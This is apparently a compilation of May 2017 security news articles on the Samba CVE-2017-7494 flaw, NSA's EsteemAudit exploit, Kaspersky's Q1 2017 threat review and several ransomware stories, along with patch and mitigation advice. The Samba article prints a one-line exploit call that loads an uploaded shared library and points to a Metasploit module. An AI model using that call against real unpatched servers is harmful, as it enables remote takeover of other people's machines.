The announcement published by Samba informed users that a patch addressing this remote code execution vulnerability tracked as CVE-2017-7494 was available at the following URL:

http://www.samba.org/samba/security/

Sysadmins have to patch their versions as soon as possible, if it is not possible for any reason a workaround can be implemented by the adding the line

nt pipe support = no
to their Samba configuration file and restarting the network’s SMB daemon.

The change will limit clients from accessing some network computers.

“Additionally, Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.”

The Samba bug appears to be a network wormable issue that could be exploited by a malicious code to self-replicate from vulnerable machine to vulnerable machine without requiring user interaction.
Hurry up, the exploit for the Samba bug is expected to be available in the days for the Metasploit framework.

HD Moore, who is vice president of research and development at Atredis Partners, posted the following images showing successful exploits against Samba on a computer running Ubuntu and NAS device made by Synology.

ubuntu samba exploit
HD Moore @hdmoore
Examples of exploiting Samba CVE-2017-7494 on Ubuntu 16.04 and a Synology NAS. Metasploit module should be PRd sometime in the next 24 hours
11:20 PM - 24 May 2017
469 469 Retweets 387 387 likes
Twitter Ads info & Privacy
ubuntu samba exploit

The first crack at a Metasploit PR for Samba CVE-2017-7494 already appeared on GitHub.

Follow
HD Moore @hdmoore
First crack at a Metasploit PR for Samba CVE-2017-7494: https://github.com/rapid7/metasploit-framework/pull/8450 …
2:50 AM - 25 May 2017
Photo published for First crack at Samba CVE-2017-7494 by hdm · Pull Request #8450 · rapid7/metasploit-framework
First crack at Samba CVE-2017-7494 by hdm · Pull Request #8450 · rapid7/metasploit-framework
This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an updat...
github.com
171 171 Retweets 161 161 likes


Wanna Cry Again? NSA’s Windows 'EsteemAudit' RDP Exploit Remains Unpatched
25.5.2017 thehackernews Ransomware

Brace yourselves for a possible 'second wave' of massive global cyber attack, as SMB (Server Message Block) was not the only network protocol whose zero-day exploits created by NSA were exposed in the Shadow Brokers dump last month.
Although Microsoft released patches for SMB flaws for supported versions in March and unsupported versions immediately after the outbreak of the WannaCry ransomware, the company ignored to patch other three NSA hacking tools, dubbed "EnglishmanDentist," "EsteemAudit," and "ExplodingCan."
It has been almost two weeks since WannaCry ransomware began to spread, which infected nearly 300,000 computers in more than 150 countries within just 72 hours, though now it has been slowed down.
For those unaware, WannaCry exploited a Windows zero-day SMB bug that allowed remote hackers to hijack PCs running on unpatched Windows OS and then spread itself to other unpatched systems using its wormable capability.
EsteemAudit: Over 24,000 PCs Still Vulnerable
EsteemAudit is another dangerous NSA-developed Windows hacking tool leaked by the Shadow Brokers that targets RDP service (port 3389) on Microsoft Windows Server 2003 / Windows XP machines.
Since Microsoft no longer support Windows Server 2003 and Windows XP and unlike EternalBlue the company has not released any emergency patch for EsteemAudit exploit so far, over 24,000 vulnerable systems remains still exposed on the Internet for anyone to hack.
"Even one infected machine opens your enterprise to greater exploitation," says enSilo, a cyber security firm who came up with the AtomBombing attack last year and now has released an unofficial patch for EsteemAudit, which we have introduced later in this article.
EsteemAudit can also be used as a wormable malware, similar to the WannaCry ransomware, which allows hackers to propagate in the enterprise networks, leaving thousands of systems vulnerable to ransomware, espionage and other malicious attacks.
Ransomware authors, such as criminals behind CrySiS, Dharma, and SamSam, who are already infecting computers via RDP protocol using brute force attacks, can leverage EsteemAudit anytime for widespread and damaging attacks like WannaCry.
How to Secure Your Computers?

Due to the havoc caused by WannaCry, SMB service gained all the attention, neglecting RDP.
"Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today, and the cyber security industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of the global market share," enSilo says.
Since Microsoft has not released any patch for this vulnerability, users and enterprises are advised to upgrade their systems to the higher versions to secure themselves from EsteenAudit attacks.
"Of the three remaining exploits, “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan,” none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk," Microsoft says.
If it's hard for your enterprise to upgrade their systems immediately, it's good for them to secure their RDP port by either disabling it or putting it behind the firewall.
Meanwhile, enSilo has released a patch to help Windows XP and Server 2003 users secure their machines against EsteemAudit. You can apply the patch to secure your systems, but keep in mind, that it is not an official patch from Microsoft.
If you have any doubt on the patch, enSilo is a reputed cyber security company, though I expect Microsoft to release an official patch before any outcry like that of WannaCry.


IT threat evolution Q1 2017
25.5.2017 Kaspersky Analysis

The aim of most targeted attack campaigns is to steal sensitive data. However, this isn’t always the goal. Sometimes attackers erase data instead of – or as well as – trying to gain access to confidential information. We’ve seen several wiper attacks in recent years. They include Shamoon (also known as ‘Disttrack’), believed to have been used to erase data on more than 30,000 computers at Saudi Aramco in 2012, and Dark Seoul, used in the attack on Sony Pictures in 2013.

IT threat evolution Q1 2017

Shamoon re-appeared in November 2016, targeting organisations in various critical and economic sectors in Saudi Arabia. So far we have observed three waves of attacks using the Shamoon 2.0 malware – activated on 17 November 2016, 29 November 2016 and 23 January 2017.

While the attacks share many similarities with the earlier wave of attacks, they now feature new tools and techniques. The attackers start by obtaining administrator credentials for the target network. Then they build a custom wiper (Shamoon 2.0) which uses the stolen credentials for lateral movement across the organisation. Finally, the wiper activates on a predefined date, leaving the infected computers unusable. The final stage of the attack is completely automated and doesn’t rely on communication with the attacker’s C2 (Command-and-Control) center.

Shamoon 2.0 also includes a ransomware component. This has yet to be used in the wild, so it’s unknown whether the attackers would use this part of the platform for financial gain or for idealistic purposes.

While investigating the Shamoon attacks, we discovered a previously unknown wiper. This malware, which we’ve named StoneDrill, also seems to target organisations in Saudi Arabia. There are similarities in style to Shamoon, with additional features designed to help it evade detection. One of the victims of StoneDrill, observed via the Kaspersky Security Network (KSN) is located in Europe (and operates in the petro-chemicals sector), suggesting that the attackers might be expanding their wiping operations beyond the Middle East.

IT threat evolution Q1 2017

The most significant difference between the two relates to the wiping process. Shamoon uses a disk driver for direct access to the disk, whereas StoneDrill injects the wiper directly into the victim’s preferred browser.

StoneDrill also shares similarities with an APT group known as NewsBeef (also known as ‘Charming Kitten’), so-called because of its use of the Browser Exploitation Framework (BEeF). These similarities include familiar WinMain and OS signatures, update commands and C2 server names. It isn’t known whether the groups behind Shamoon and StoneDrill are the same, or are just aligned in terms of interests and the regions they target – the latter seems most likely to us.

IT threat evolution Q1 2017

In addition to the wiping module, StoneDrill also includes a backdoor that has been used to run espionage operations against a number of targets.

You can find the full report on Shamoon 2.0 and StoneDrill here. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

EyePyramid

As we’ve seen before, targeted attacks don’t have to be technically advanced in order to be successful. In January 2016, the arrest of two suspects by Italian police brought to light a series of cyber-attacks that targeted prominent politicians, bankers, freemasons and members of law enforcement agencies.

The malware used in the attacks, called ‘EyePyramid’, was unsophisticated, but nevertheless successful enough to enable the attackers to gain access to all resources on their victims’ computers. The police investigation revealed 100 active victims in the server used to host the malware, but there were indications that the attackers had targeted around 1,600 victims in the last few years. Their victims – located mostly in Italy – included law firms, consultancy services, universities and Vatican cardinals.

IT threat evolution Q1 2017

The Italian police report didn’t include technical details about how the malware was spread – other than revealing that spear-phishing was used. However, it did identify a number of C2 servers and e-mail addresses used by the attackers to exfiltrate stolen data. Using this information, we created a YARA rule, based on custom e-mail addresses, C2 servers, licences for the custom mailing library used by the attackers and specific IP addresses used in the attack. Then we ran it through our systems to see if it matched any known samples. Out initial YARA rule highlighted two samples which enabled us to create a more specific YARA rule that identified a further 42 samples in our collection. A further search revealed more details about EyePyramid. The attacks relied on social engineering to trick victims into opening and running infected files attached to the spear-phishing e-mails. The attachments used were ZIP and 7ZIP archives which contained the malware. The attackers used multiple spaces to try and mask the extension of the file – underlining the low level of sophistication of the attacks.

Based on the compilation time-stamps of the samples, which appear to be legitimate, most samples used in the attacks were compiled in 2014-15.

IT threat evolution Q1 2017

It’s clear that cybercriminals can achieve success even when the malware they use is neither sophisticated nor hard to detect. From the poor OPSEC (operational security) employed in the campaign (for example, using IP addresses associated with their own company and discussing victims in regular phone calls and using WhatsApp), it’s clear that the attackers were amateurs. Nevertheless, they were able to operate for many years and managed to steal gigabytes of data from their victims.

You can read our full report on EyePyramid here.

Breaking the weakest link of the strongest chain

In the middle of 2016 more than 100 Israeli servicemen were targeted by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ C2 server.

The IDF (Israeli Defense Forces) C4I and the IDF Information Security Department unit, with Kaspersky Lab researchers, obtained a list of the victims – all IDF servicemen serving around the Gaza strip.

This campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device has been compromised, a process of sophisticated intelligence gathering begins, exploiting the phone’s video and audio capabilities, SMS functions and location.

The attacks are unsophisticated, relying heavily on social engineering techniques. The attackers lure their victims into installing a malicious application, while continuously attempting to acquire confidential information using social networks: the group seems particularly active on Facebook Messenger. Most of the avatars used by the attackers (virtual participants in the social engineering stage of the attack) lure the victims using sexual themes: for example, asking the victim to send explicit photographs and, in return, sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and others.

The victim is tricked into downloading an app from a malicious URL. The app collects data from the victim’s phone, including general information (network operator, GPS location, IMEI, etc.), contacts, browsing history, SMS messages, pictures. The app is also able to record video and audio.

IT threat evolution Q1 2017

The IDF, which led the research along with Kaspersky lab researchers, believes that this is just the opening shot of a wider campaign that is designed to capture data on how ground forces are distributed, the tactics and equipment the IDF uses and real-time intelligence.

You can read our full report on this campaign here.

The non-persistence of memory

During an incident response, security specialists hunt for any artefacts that attackers have left behind in the victim’s network. This includes inspecting log files, looking for files on the hard drive, looking at the registry and checking memory.

However, each of these has a different ‘shelf-life’: in other words, the clues will be available to an analyst for a shorter or longer time, depending on where they’re located. Data stored on a hard drive will probably be available to a forensic analyst for a long time: although, as we saw with Duqu 2.0, sophisticated malware might deliberately remove all traces from the hard drive after installation, leaving itself in memory only. This is why memory forensics is critical to the analysis of malware and its functions.

Another important aspect of an attack is the tunnels that are installed in the network by an attacker. Cybercriminals (such as Carbanak and GCMAN) might use PLINK for this purpose; Duqu 2.0 used a special driver.

In our predictions for 2017 we forecast an increase in ephemeral infections – memory-resident malware intended for general reconnaissance, with no interest in persistence. In highly sensitive environments, where stealth is essential, attackers might well be satisfied to operate until the malware is cleared from memory during a re-boot, since this will reduce the likelihood of the malware being detected and their operation being compromised.

During a recent incident response our experts found that both memory-based malware and tunnelling had been implemented in a bank attack using standard Windows utilities such as SC and NETSH. The threat was originally discovered by the bank’s security team after they detected Meterpreter code inside the physical memory of a domain controller. We participated in the forensic analysis following this detection and discovered the use of PowerShell scripts within the Windows registry. We also discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker´s C2.

IT threat evolution Q1 2017

You can read the details of our investigation here.

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry.

IT threat evolution Q1 2017

We don’t know if they were all infected by the same attacker. During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML and .CF ccTLDs. The benefit, for the attackers, of using such domains is that they are free and don’t include WHOIS information after the domain expiration. The fact that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information makes attribution almost impossible. The closest groups with the same TTPs are Carbanak and GCMAN.

Techniques like this are becoming more common, especially in attacks against financial institutions. Exfiltration of data can be achieved using standard utilities and some tricks, without the need for malware. Such ephemeral attacks highlight the need for sophisticated, proactive technology in anti-malware solutions, such as Kaspersky Lab’s System Watcher.

KopiLuwak: a new JavaScript payload from Turla

The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.

In January, John Lambert from Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a ‘very interesting .JS backdoor‘. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ‘ICEDCOFFEE’ payloads (detailed in a private report from June 2016 which is available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

The targeting of this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. However, the frequency is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits (as of January 2017). We strongly believe that this new JavaScript will be used more heavily in the future as a first-stage delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the attackers to run arbitrary commands via Wscript.

Full details on KopiLuwak can be found here.

The document contains a malicious macro that’s very similar to macros used previously by Turla to deliver Wipbot, Skipper, and ICEDCOFFEE. The Turla group continues to rely heavily on embedded macros in Office documents. This might seem to be a basic tactic for such a sophisticated attacker, but it has helped them to compromise high-value targets. We would advise organisations to disable macros and not allow employees to enable such content unless it’s absolutely necessary.

IT threat evolution Q1 2017

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Based on the name of the document, ‘National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc’, we presumed it may have been sent from the Qatar Ambassador’s secretary to the Ministry of Foreign Affairs, possibly indicating that the Turla group already had control of at least one system within Qatar’s diplomatic network.

The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host intrusion detection and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Malware stories

Stand and deliver: your money or your files!

In eighteenth century Britain (and elsewhere) travellers could be waylaid by a highwayman – a thief who held up coaches on the public highway and demanded that those on board hand over their money and other valuables. The highwayman would typically issue the challenge – ‘Stand and deliver: your money or your life! Ransomware is a version of such highway robbery for the digital age – with the difference that it’s our data that is held hostage and the ‘highwayman’s’ ransom demand is displayed on the screen.

There were more than 1,445,000 ransomware attacks in 2016, on businesses as well as individuals. The huge growth we’ve seen in recent years is fuelled by the success that cybercriminals have had with this type of malware – ransomware is easily monetised and involves a low investment cost per victim.

Out of the 62 new crypto-ransomware families that we discovered last year, at least 47 were developed by Russian-speaking cybercriminals. In February, we published a report on the Russian ransomware economy. It’s clear that the development of ransomware is underpinned by a flexible and user-friendly underground eco-system that allows criminals to launch attack campaigns with almost any level of computer skills and financial resources. Our researchers identified three levels of criminal involvement in the ransomware business.

The first is the creation and update of ransomware families. This requires advanced code-writing skills; and those involved are the most privileged members of the ransomware underground, since they are the key to the whole eco-system. The second is the development and support of affiliate programmes for distributing ransomware. This is done by criminal communities that deliver the ransomware using ancillary tools such as exploit kits and spam. The third is partner participation in such affiliate programmes. Those involved are on the lowest rung of the ladder and their role is to help the owners of affiliate programmes to spread the malware, in return for a cut of the proceeds: the only qualifications required are a willingness to carry out illegal activities and the money to join the affiliate scheme.

We were able to identify several large groups of Russian-speaking criminals specialising in crypto-ransomware development and distribution. These groups might bring together tens of different partners, each with their own affiliate programme. The list of their targets includes not only individual consumers, but small- and medium-sized businesses and even enterprises. While initially targeting organisations in the Russian Federation, these groups are now shifting their attention to companies in other parts of the world. The daily revenue of an affiliate programme might reach tens, or even hundreds, of thousands of dollars: of this, around 60 per cent stays in the pockets of the criminals as net profit.

In March we reported a new ransomware family used in targeted attacks against organizations, named PetrWrap. One they have gained a foothold in the target company, the attackers use the PsExec tool to install ransomware on all computers. One especially interesting aspect of this ransomware is that the attackers use the well-known Petya ransomware to encrypt data. Although Petya makes use of a ‘Ransomware-as-a-Service’ model, the attackers didn’t make use of this facility. Instead, they include a sample of the Petya ransomware inside the data section of the malware and use Petya to infect their victims’ computers. A special module patches the original Petya ransomware ‘on the fly’. This allows the attackers to hide the fact that they are using Petya.

Targeted ransomware attacks on organizations are becoming more common. The groups using ransomware in targeted attacks typically try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks such as Mimikatz to obtain the necessary credentials to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up-to-date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on all their endpoints.

The Internet of broken Things

You might remember that in October 2016, cybercriminals used a botnet of Internet-connected home devices (such as IP-enabled cameras, DVRs, CCTV cameras and printers) to launch DDoS attack. To do this, the attackers infected vulnerable devices with the Mirai malware. This operation was significant not only because it misused Internet of Things (IoT) devices, but also because the DDoS traffic generated exceeded all previous volumes. The DDoS took down a portion of the Internet and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out activity by a nation state, because of the overall power of the Mirai botnets. But even the scale of these attacks didn’t require the work of a nation state. Time will tell if nation states choose to hide their destructive activity in plain sight in the IoT – the capabilities are clearly available. It’s possible that we might see a nation state tempted to take down wide swaths of the Internet using this juvenile toolset.

In February, we looked at reports of a cross-platform Win32-based Mirai spreader and botnet in the wild. Some of the public discussions around this suggested that an entirely new IoT bot is spreading to and from Windows devices. But this is not the case: rather, a previously active Windows botnet is now spreading a Mirai bot variant. We hadn’t seen this spreader variant pushing Mirai downloaders until January. But this Windows bot itself is not new. The Windows bot’s method for distributing Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute-forces a remote telnet connection.

So we haven’t seen a sensational hop from Linux Mirai to Windows Mirai. But we do have a new threat and the use of Windows to spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running Windows can be a problem, because they can be Internet-facing, and have access to private network connected IP-based cameras, DVR, media center software and other internal devices.

It’s unfortunate to see any sort of Mirai crossover between the Linux and Windows platforms. Just as the release of source code for the Zeus banking Trojan brought years of problems for the online community, the release of Mirai IoT bot source code will also bring major problems to the Internet infrastructure for years to come. This is just the start.

In response to the huge problem this poses to the Internet infrastructure, over the past few months our team and CERT have participated in multiple successful C2 take-down efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these take-downs as ‘whack a mole’, these efforts resulted in relief from Gbps DDoS storms for major networks. We’re happy to partner with more network operators to use our connections with CERTs, law enforcement agencies and other partners around the world, to build on this success.

You can read our report here.

This attack, like others that involve compromised IoT devices, exploited the fact that many people don’t change the manufacturer’s default credentials when they buy a smart device. This makes it easy for attackers to access the device – they simply have to try the known default password. In addition, there are no firmware updates for many devices. IoT devices are also an attractive target for cybercriminals because they often have 24/7 connectivity.

These days we’re surrounded by smart devices. This includes everyday household such as telephones, televisions, thermostats, refrigerators, baby monitors, fitness bracelets and children’s toys. But it also includes cars, medical devices CCTV cameras and parking meters. Some homes are even designed now with the ‘smartness’ built-in. Ubiquitous Wi-Fi brings all these devices online, as part of the Internet of things (IoT). These things are designed to make our lives easier. Since everyday objects are able to collect and transfer data automatically, without human interaction, they can operate more effectively and efficiently. However, a world of connected everyday objects means a bigger attack surface for cybercriminals. Unless IoT devices are secured, the personal data they exchange can be compromised, they can be subject to an attack, or they can be used in an attack.

One of the problems associated with IoT devices is that they are often everyday objects that have provided useful functions for much longer than the Internet has been around. So we don’t see the computer within the object. Nowhere is this truer than with children’s toys. In the last two years security and privacy concerns around children’s toys have been raised on a number of occasions (you can read more here, here and here).

In February, similar concerns were raised about the My Friend Cayla doll. The Federal Network Agency, the German telecommunications watchdog, suggested that parents that had bought the doll should destroy it because of these worries.

The best advice for anyone using connected/IoT devices at home, is to ensure the default passwords on all devices are changed (using unique, complex passwords) to prevent them being remotely accessed – this includes home routers, which are the gateway to your home network. The temptation may be for people to want to disconnect all devices in light of such news, but in today’s increasingly connected world, that’s not realistic; although it’s always good to review the functionality of a smart device and disable any functions that you don’t actually need. However, good password ‘housekeeping’ goes a long way to keeping cybercriminals away from your devices. This kind of large scale attack also highlights the need for manufacturers to consider security by design, rather as an afterthought.

Data breaches and data dumps

We’ve become accustomed to seeing a steady stream of security breaches month after month; and this quarter has been no exception, including attacks on Barts Health Trust, Sports Direct, Intercontinental Hotels Group and ABTA.

Some breaches result in the theft of sensitive data, highlighting the fact that many companies fail to take adequate steps to defend themselves. Any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. One alternative is to use a password manager application to handle all this automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

The public dumping of sensitive information has been gathering pace in recent years. This is a trend that we predicted in 2015. ‘Hacktivists’, criminals and state-sponsored attackers alike have embraced the strategic dumping of private pictures, information, customer lists and code to shame their targets. While some of these attacks are strategically targeted, some are also the product of opportunism, taking advantage of poor cyber-security.

In February, WikiLeaks released more than 8,000 documents, referred to as ‘Vault 7’, that describe tactics and tools used to break into computing devices from leading manufacturers, to circumvent installed security solutions and even lay a trail of false flags. The first batch of documents released (dated between 2013 and 2016) included documentation on how to compromise major browsers, smartphones and computers running Windows, Mac OS and Linux. Subsequent dumps of data focused on the development of malware to compromise firmware running on Mac OS and iOS, especially EFI and UEFI firmware; and on methods to evade detection. You can read more here and here.

We can only expect this practice to continue to grow in the future. Consumers and businesses alike should use encryption to secure sensitive data and should ensure that they apply updates as soon as they become available, to reduce the chances that their data will be stolen and dumped online.


7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely
25.5.2017 thehackernews Vulnerebility
A 7-year-old critical remote code execution vulnerability has been discovered in Samba networking software that could allow a remote attacker to take control of an affected Linux and Unix machines.
Samba is an open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system.
The newly discovered remote code execution vulnerability (CVE-2017-7494) affects all versions newer than Samba 3.5.0 that was released on March 1, 2010.
"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it," Samba wrote in an advisory published Wednesday.
Linux version of EternalBlue Exploit?

According to the Shodan computer search engine, more than 485,000 Samba-enabled computers exposed port 445 on the Internet, and according to researchers at Rapid7, more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, out of which 92,000 are running unsupported versions of Samba.
Since Samba is the SMB protocol implemented on Linux and UNIX systems, so some experts are saying it is "Linux version of EternalBlue," used by the WannaCry ransomware.
...or should I say SambaCry?
Keeping in mind the number of vulnerable systems and ease of exploiting this vulnerability, the Samba flaw could be exploited at large scale with wormable capabilities.
Home networks with network-attached storage (NAS) devices could also be vulnerable to this flaw.
Exploit Code Released! (Bonus: Metasploit Module)

The flaw actually resided in the way Samba handled shared libraries. A remote attacker could use this Samba arbitrary module loading vulnerability to upload a shared library to a writable share and then cause the server to load and execute malicious code.
The vulnerability is hell easy to exploit. Just one line of code is required to execute malicious code on the affected system.
simple.create_pipe("/path/to/target.so")
However, the Samba exploit has already been ported to Metasploit, a penetration testing framework, enabling researchers as well as hackers to exploit this flaw easily.
Patch and Mitigations
The maintainers of Samba has already patched the issue in their new versions Samba versions 4.6.4/4.5.10/4.4.14, and are urging those using a vulnerable version of Samba to install the patch as soon as possible.
But if you can not upgrade to the latest versions of Samba immediately, you can work around the vulnerability by adding the following line to your Samba configuration file smb.conf:
nt pipe support = no
Once added, restart the network's SMB daemon (smbd) and you are done. This change will prevent clients from fully accessing some network machines, as well as disable some expected functions for connected Windows systems.
While Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for its users, the larger risk is that from NAS device consumers that might not be updated as quickly.
Craig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability "has potential to be the first large-scale Linux ransomware worm."
Update: Samba maintainers have also provided patches for older and unsupported versions of Samba.
Meanwhile, Netgear released a security advisory for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later.
However, the company currently released firmware fixes for only ReadyNAS products running OS 6.x.


Master Keys for Crysis ransomware released on a forum
25.5.2017 securityaffairs Ransomware

Researchers at ESET security firm have discovered that someone has released 200 master keys for the latest variants of the prominent Crysis ransomware.
While security experts continue to investigate the WannaCry attack, someone has released 200 master keys for the latest variants of the prominent Crysis ransomware. The file encrypted by this version have the .wallet and .onion extension added to their original name.

Antivirus firm ESET has used the leaked information to develop the ESET Crysis decrypting tool that is available for download on the company “utilities page.”

The master keys were posted by a new member of a forum at BleepingComputer.com that aim to help victims of this threat.

crysis ransomware

This is the third time that someone published the master key for the Crysis ransomware.

“This has become a habit of the Crysis operators lately – with this being the third time keys were released in this manner. Since the last set of decryption keys was published, Crysis ransomware attacks have been detected by our systems over ten thousand times.” reads the blog post published by ESET.

Decryption tools allow victims of the ransomware-based campaigns to restore their files without paying the ransom to the criminal organizations.

Recently the Quarkslab researcher, Adrien Guinet, has published a software, called Wanadecrypt, he used to recover the decryption key required to restore the files on an infected XP computer. The expert successfully tested the Wanadecrypt software on a small number of infected XP computers, but it is not clear if the technique works on every PC.

The technique devised by Adrien Guinet allows retrieving the secret encryption keys used by the WannaCry ransomware for free, it works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

Security researcher Benjamin Delpy developed another tool called WanaKiwi that not only retrieve the prime numbers from the memory but automate the whole decryption process of the WannaCry-infected files.

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 as explained by Matt Suiche from security firm Comae Technologies.

Despite the efforts of law enforcement and security firms in the fights against ransomware, this category of malware remains one of the most dangerous computer threats. Prevention is essential in keeping users safe.

“Prevention is essential in keeping users safe. Therefore, we recommend that all users keep their operating systems and software updated, use reliable security solutions with multiple layers of protection, and regularly back up all important and valuable data at an offline location (such as external storage).” concluded ESET.


Microsoft Unveils Special Version of Windows 10 For Chinese Government
25.5.2017 thehackernews IT
China is very strict about censorship, which is why the country has become very paranoid when it comes to adopting foreign technologies.
The country banned Microsoft's Windows operating system on government computers in 2014 amid concerns about security and US surveillance.
Even in the wake of that, China had been pushing its custom version of Windows XP and its forked version of Ubuntu Linux.
To deal with this issue and target the world's largest market, Microsoft's CEO for the Greater China region last year confirmed that the company was working on a Chinese version of Windows 10 that included "more management and security controls" and less bloatware.
Now, Microsoft has just announced a new version of its Windows 10, which is now ready for Chinese government agencies to use.
In its event in Shanghai on Tuesday, Microsoft announced Windows 10 China Government Edition specifically designed for the Chinese government.The OS is based on Windows 10 Enterprise Edition, but with a few tweaks to keep Chinese officials happy.
Windows 10 Enterprise Edition already provides several security, identity, and manageability features governments and enterprises need, but Windows 10 China Government Edition will let the country use the management feature to monitor and deploy updates as needed, manage telemetry, and use its own encrypted algorithms.
Designed to work with Chinese Encryption Algorithms
Microsoft enables the Chinese government to use its own encrypted algorithms in its Windows 10 China Government Edition in order to secure data that they do not want others to see.
Allows to Remove Unwanted Apps
The Chinese version of Windows 10 does not allow access to features that are not needed by Chinese government employees like Microsoft's OneDrive service that let people store their documents and files on Microsoft-controlled data centers.
Apparently, the Chinese officials don't want anyone to access their data, so they will keep their data locked down on their own computers in an attempt to have full control over it.
Manage Telemetry Data Collection & Updates
The last year's outcry over Microsoft's silent slurping of telemetry data from users' computers might have made the Chinese officials ask for the control over telemetry of its China version of Windows, preventing Microsoft to collect data on its citizen.
So basically, all Windows 10 users around the world do not have any option to turn off telemetry, but the Chinese government could do so.
"For more than two decades, Microsoft has had the distinct honor to work in China, learning and advancing technology together," executive vice president Terry Myerson writes on the Windows 10 Blog.
"Over the last two years, we have earnestly cooperated with the Chinese government on the security review of Windows 10. The Chinese government has the highest standards for security."
A release date for the Windows 10 China Government Edition have not yet announced, but three Chinese government groups have already announced their plans to adopt Windows 10 China Government Edition.
These three government groups are China Customs, Westone Information Technology and the City of Shanghai on the national, state-owned and regional enterprise levels, respectively.
Besides this, Lenovo has also announced its plans to be the first OEM partner to have devices that come preinstalled with Windows 10 China Government Edition.


New Jaff Ransomware Variant Emerges

25.5.2017 securityweek  Ransomware

Although it dominated headlines over the past couple of weeks, WannaCry wasn’t the only ransomware family running rampant. Another active threats was Jaff, a ransomware family that emerged just days before the WannaCry outbreak.

Right from the start, Jaff stood out because it was being distributed by the Necurs botnet and was using a similar ransom page design as Locky. Thus, it didn’t take long for security researchers to associate the new threat with the actors behind Locky and Dridex, who also launched the Bart ransomware last year.

The ransomware was appending the .jaff extension to the encrypted files and demanding a huge ransom, at around 2 Bitcoin. The infection vector was .PDF files sent as attachments in spam emails.

A newly observed Jaff variant continues to use Necurs and PDF files for infection, but moved away from the .jaff extension and the Locky-like ransom note, Brad Duncan, Palo Alto Networks threat intelligence analyst and handler at the SANS Internet Storm Center, says.

The ransomware now appends the .wlu extension to the encrypted files and uses a ransom note featuring green fonts on a dark background. The security researcher also noticed that the ransomware authors ask for a 0.35630347 Bitcoin ransom now.

First observed on Tuesday, May 23, the spam emails distributing the new Jaff variant use a fake invoice theme. These messages feature a PDF attachment that contains an embedded Word document with malicious macros designed to infect the machine with rasomware.

